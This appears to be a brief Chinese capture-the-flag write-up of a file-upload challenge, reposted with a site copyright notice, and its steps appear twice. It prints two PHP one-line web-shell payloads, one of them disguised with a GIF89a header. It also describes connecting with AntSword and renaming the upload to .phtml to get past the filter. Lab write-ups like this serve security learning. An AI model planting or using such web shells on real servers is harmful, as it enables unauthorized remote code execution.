进入靶场
是文件上传类题目
随便传个图片
制作个含木马的
算了,直接抓包只传文件改格式好了
第一次传的是<?php @eval($_POST['attack']);?>
第二次传的是GIF89a? <script language="php">eval($_REQUEST[1])</script>
"GIF89a" 指的是 GIF 格式的 89a 版本
一直修改到这个页面才上传成功
用蚁剑连接
连不上一点
改文件后缀为phtml
根目录里找到了flag文件
进入靶场
是文件上传类题目
随便传个图片
制作个含木马的
算了,直接抓包只传文件改格式好了
第一次传的是<?php @eval($_POST['attack']);?>
第二次传的是GIF89a? <script language="php">eval($_REQUEST[1])</script>
"GIF89a" 指的是 GIF 格式的 89a 版本
一直修改到这个页面才上传成功
用蚁剑连接
连不上一点
改文件后缀为phtml
根目录里找到了flag文件
版权声明:
本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。
我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com